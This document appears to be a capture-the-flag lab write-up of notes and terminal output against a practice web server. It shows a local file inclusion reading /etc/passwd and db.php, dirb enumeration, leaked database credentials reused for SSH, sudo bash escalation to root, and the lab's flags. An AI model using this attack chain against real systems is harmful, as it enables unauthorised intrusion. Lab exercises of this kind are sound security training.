['22', '80']
Hostname: WEB01-Zues

http://10.10.110.205/blog.php?article=posts/blockchain_3feb.php
attempted LFI
	http://10.10.110.205/blog.php?article=/etc/passwd (success)
	observed panos as current user

used dirb on (http://10.10.110.205/, and http://10.10.110.205/blog.php?article=)
	http://10.10.110.205/blog.php?article=db.php (found)
		after viewing page source
		$servername = "localhost";
		$username = "panos";
		$password = "supersecretpassword";
		
logged into SSH via discovered cred (success)
	Flag: GENESIS{NICE_DIR_YOU_GOT_THERE}
	PE enum via sudo -l
	discovered /bin/bash
	ran sudo bash
	priv es'd to Root
	
on WEB01-Zues as root
	discovered flag: GENESIS{you_G0T_H3r3_quick!}


*****COMMANDS*****
	└─$ dirb http://10.10.110.205/blog.php?article= -X .php  

	-----------------
	DIRB v2.22    
	By The Dark Raver
	-----------------

	START_TIME: Thu Feb 22 15:21:28 2024
	URL_BASE: http://10.10.110.205/blog.php?article=
	WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
	EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

	-----------------

	GENERATED WORDS: 4612                                                          

	---- Scanning URL: http://10.10.110.205/blog.php?article= ----
	+ http://10.10.110.205/blog.php?article=blog.php (CODE:200|SIZE:1081)                                                 
	+ http://10.10.110.205/blog.php?article=db.php (CODE:200|SIZE:778)                                                    
	+ http://10.10.110.205/blog.php?article=index.php (CODE:200|SIZE:2595)                                                
		                                                                                                              
	-----------------
	END_TIME: Thu Feb 22 15:42:46 2024
	DOWNLOADED: 4612 - FOUND: 3

\/\/\/\/\/\/\/\\/\/\/\/\/\/\\/\/\/\/\/\/\/\/\/\/\/\/\/\/
	panos@WEB01-Zeus:~$ cat flag.txt
	GENESIS{NICE_DIR_YOU_GOT_THERE}
	
	panos@WEB01-Zeus:~$ sudo -l
	Matching Defaults entries for panos on WEB01-Zeus:
	    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

	User panos may run the following commands on WEB01-Zeus:
	    (ALL) NOPASSWD: /bin/bash

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
	panos@WEB01-Zeus:/bin$ sudo bash
	root@WEB01-Zeus:/usr/bin# whoami
	root
	root@WEB01-Zeus:/usr/bin# cd /root
	root@WEB01-Zeus:~# ls -la
	total 40
	drwx------  6 root root 4096 Mar 30  2023 .
	drwxr-xr-x 19 root root 4096 Jul 22  2022 ..
	lrwxrwxrwx  1 root root    9 Dec 11  2020 .bash_history -> /dev/null
	-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
	drwx------  2 root root 4096 Jul 22  2022 .cache
	-r--------  1 root root   29 Dec 11  2020 flag.txt
	drwx------  3 root root 4096 Jul 22  2022 .gnupg
	drwxr-xr-x  3 root root 4096 Jul 22  2022 .local
	-rw-r--r--  1 root root  161 Aug 17  2020 .profile
	drwx------  2 root root 4096 Jul 22  2022 .ssh
	-rw-rw-rw-  1 root root 1560 Mar 30  2023 .viminfo
	root@WEB01-Zeus:~# cat flag.txt
	GENESIS{you_G0T_H3r3_quick!}


